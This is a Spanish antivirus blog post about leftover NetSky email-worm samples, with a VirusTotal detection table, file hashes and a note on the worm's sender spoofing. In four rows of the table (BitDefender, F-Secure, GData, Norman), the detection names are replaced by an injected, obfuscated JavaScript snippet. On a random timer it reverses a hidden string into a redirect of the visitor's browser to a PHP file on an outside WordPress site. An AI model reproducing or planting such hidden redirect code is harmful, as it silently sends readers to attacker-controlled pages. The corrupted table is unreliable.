Aun llegan muestras del NetSky, virus que se propagaba por e-mail y que ya controlamos en su día con el ELINETSA

ya totalmente controlado por todos los AV de VirusTotal, además de tambien por el ELINETSA.EXE, utilidad con la que controabamos las variantes de NetSky, aun llegan muestras de ficheros infectados por dicho virus, seguramente de alguien que no usa antivirus…
File name: data.rtf […].scr
Submission date: 2011-03-16 11:27:32 (UTC)

Result: 43/ 43 (100.0%)
VT Community

malware
Safety score: 0.0%
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.03.16.04 2011.03.16 Win32/Netsky.worm.29568
AntiVir 7.11.4.221 2011.03.16 Worm/Netsky.AP
Antiy-AVL 2.0.3.7 2011.03.16 Worm/Win32.NetSky
Avast 4.8.1351.0 2011.03.16 Win32:Netsky-AF
Avast5 5.0.677.0 2011.03.16 Win32:Netsky-AF
AVG 10.0.0.1190 2011.03.16 I-Worm/Netsky
BitDefender 7.2 2011.03.16 touch 5.2.11.5 2011.03.16 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm
F-Secure 9.0.16440.0 2011.03.14 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm
GData 21 2011.03.16 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM
McAfee-GW-Edition 2010.1C 2011.03.16 Heuristic.BehavesLike.Win32.Packed.A
Microsoft 1.6603 2011.03.16 Worm:Win32/Netsky.P@mm
NOD32 5957 2011.03.16 Win32/Netsky.Q
Norman 6.07.03 2011.03.16 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32.Netsky.P@mm”>W32.Netsky.P@mm
TheHacker 6.7.0.1.150 2011.03.16 W32/Netsky(2).gen@MM
TrendMicro 9.200.0.1012 2011.03.16 WORM_NETSKY.P
TrendMicro-HouseCall 9.200.0.1012 2011.03.16 WORM_NETSKY.P
VBA32 3.12.14.3 2011.03.15 Email-Worm.Win32.NetSky.q
VIPRE 8719 2011.03.16 Email-Worm.Win32.NetSky.q
ViRobot 2011.3.16.4360 2011.03.16 I-Worm.Win32.Netsky.29568
VirusBuster 13.6.250.0 2011.03.15 I-Worm.Netsky.Q1
Additional informationShow all
MD5   : 3018e99857f31a59e0777396ae634a8f
SHA1  : 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
File size : 29568 bytes

Se recuerda que este fue de los primeros virus que utilizaron para su propagacion la tecnica Spoffing, de forma que en el remitente del mail que envia anexando el virus, figura una cuenta de correo de uno de los contactos, no la del ordenador infectado, lo cual dificulta la identificacion del ordenador infectado, ademas de confundir al receptor, que piensa que quien se lo ha enviado es otro, el mismo que recibe muchos mails devueltos por direccion erronea o caducada, a quienes el ordenador infectado ha enviado mails, pero los fallidos se devuelven al que figura como remitente, claro !

Ya practicamente erradicado, sirva este como recuerdo

saludos

ms, 16/3/2011

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies